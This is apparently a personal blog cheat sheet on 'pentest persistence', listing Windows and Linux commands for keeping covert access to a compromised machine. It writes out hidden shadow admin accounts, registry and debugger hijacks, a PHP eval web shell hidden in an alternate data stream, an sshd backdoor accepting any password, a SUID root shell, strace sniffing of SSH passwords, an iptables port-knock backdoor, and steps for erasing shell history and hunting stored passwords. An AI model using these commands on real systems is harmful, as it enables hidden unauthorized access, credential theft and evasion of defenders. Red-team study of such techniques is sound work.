Relish the Moment
About Pentest Persistence
TyeYeah Lv4
  2021-02-18 08:00:29   2022-11-26 09:03:16    968 Words  6 Mins

Persistence is to maintain your privilege after breaking into a system.

Windows

You can learn persistence methodologies/category of persistence (and other red teaming skills) with penetration testing lab.

Addition:

  1. Schedule task:
  1. Shadow account: having admin privs but not showing
  • net user admin$ Test1 /add
  • net localgroup administrators admin$ /add
  • backup HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users
  • net user admin$ /del
  • only recovery registry k-v pairs

  1. Edit registry to change startups.

    1
    2
    3
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

  2. Image File Execution Options

  • findHKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options
  • add debugger to it like:
  • reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "c:\windows\system32\calc.exe"
  • open notpad.exe, you get calc.exe started
  • to keep it silent, need HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/SilentProcessExit
  • configure (need admin privs)
    1
    2
    3
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
    reg add "KLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\taskmgr.exe"
  1. Shift backdoor

Hide tech

  1. Hide file
  • Use attrib +s +a +h +r D:\test\project\test.txt to add system, archived, hidden, read-only attributes.
  • Use ADS(alternate data stream): echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg, notepad index.php:hidden.jpg to check content.
  • Driver-class hidden: Easy File Locker
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # if cannot find file but in system dir exists:
    c:\WINDOWS\xlkfs.dat
    c:\WINDOWS\xlkfs.dll
    c:\WINDOWS\xlkfs.ini
    c:\WINDOWS\system32\drivers\xlkfs.sys
    # to clean it 
    > sc qc xlkfs
    > net stop xlkfs
    > sc delete xlkfs
    # then delete those files in system dir and restart
  • There’re many other ways but fileless attack becomes popular
  1. Hide account
  • Creating shadow account
  1. Port reuse
  • victim: winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
  • attacker: winrs -r:http://x.x.x.x -u:administrator -p:passwd whoami
  • will leave footprint in log
  1. Hide service
  • using SDDL(Security Descriptor Definition Language, able to change object DACL): sc.exe sdset test "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
  • delete SDDL statement to recover: & $env:SystemRoot\System32\sc.exe sdset auto_calc "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

Linux

Backdoors

  1. Timed task:
  • for one time: at
  • run periodically: crontab(crond process)
  • anacron
  1. sshd soft link
  • victim: ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;
  • attacker: ssh root@x.x.x.x -p 5555 with any password
  1. SUID shell
  • as root: cp /bin/bash /dev/.rootshell
  • and run: chmod u+s /dev/.rootshell
  • normal user can execute /dev/.rootshell
  1. alias to start backdoor
  • alias cat='cat&&/root/.shell'
  • similar to sshd soft link
  1. pam backdoor
  • patch pam_unix_auth.c to capture password
  1. PROMPT_COMMAND backdoor
  • PROMPT_COMMAND will execute before you run commands
  • export PROMPT_COMMAND="your_cmd"
  1. ssh log-without-pass
  • write id_rsa.pub to ~/.ssh/authorized_keys
  1. ssh wrapper
  2. ssh keylogger
  3. strace to listen ssh source traffic
  • (strace -f -F -p ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'} -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)
  • grep -E ‘read(6, “.+\0\0\0\.+”‘ /tmp/.sshd.log
  1. And the rootkit

Hide yourself

  1. Hide files into hidden directories like /tmp/.xxx/, or name it with prefix ..
  2. Hide privs, using lsattr and chattr
  3. Close history log: [space]set +o history
    • restart by [Space]set -o history
    • history -c to clean current terminal history
    • history|grep "xxx" && history -d [num] to clean specified one
  4. Port reuse
  • iptables
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    # the chain
    iptables -t nat -N LETMEIN
    # the rule
    iptables -t nat  -A LETMEIN -p tcp -j REDIRECT --to-port 22
    # start-switch
    iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
    # stop-switch
    iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
    # let's do it
    iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

    # start 
    echo threathuntercoming | socat - tcp:192.168.28.128:80
    # ssh port 80 to login 
    ssh -p 80 root@192.168.28.128
    # stop 
    echo threathunterleaving | socat - tcp:192.168.28.128:80
  • SSLH
  1. Hide process: libprocesshider

Addition:
To steal credentials on Linux:
Use grep -rn "password=" / to search all disk.
Use swap_digger to analyze swap automatically, and Impost3r to steal linux password (ssh, su, sudo).

Here recommends a linux post-exploitation framework emp3r0r

Using Pentest Framework

  1. Metasploit Framework (run * to run all modules in meterpreter)
  • persistence module
  • metsvc module
  • scheduleme & schtasksabuse module
  • mof_ps_persist module
  • Autorunscript (not a module in meterpreter) and other advanced options of exploit module.
  1. Empire
  • It provides 18 methods (4 categories, usemodule persistence/ to see)
elevated misc powerbreach userland
registry* add_netuser deaduser backdoor_lnk
schtasks* add_sid_history* eventlog* registry
wmi* debugger* resolver schtasks
wmi_updater* disable_machine_acct_change*
get_ssps
install_ssp*
memssp*
skeleton_key*
  1. Cobalt Strike
  • produce powershell backdoor: Attacks -> Web Drive-by -> Scripted Web Delivery
  • add startups into service or registry using given shell
  1. other frameworks …

Other resources

  1. 1. Windows
    1. 1.1. Hide tech
  2. 2. Linux
    1. 2.1. Backdoors
    2. 2.2. Hide yourself
  3. 3. Using Pentest Framework
  4. 4. Other resources
© 2018 - 2024    TyeYeah
Powered by Hexo & Theme Keep
Total words 135.7k
  1. 1. Windows
    1. 1.1. Hide tech
  2. 2. Linux
    1. 2.1. Backdoors
    2. 2.2. Hide yourself
  3. 3. Using Pentest Framework
  4. 4. Other resources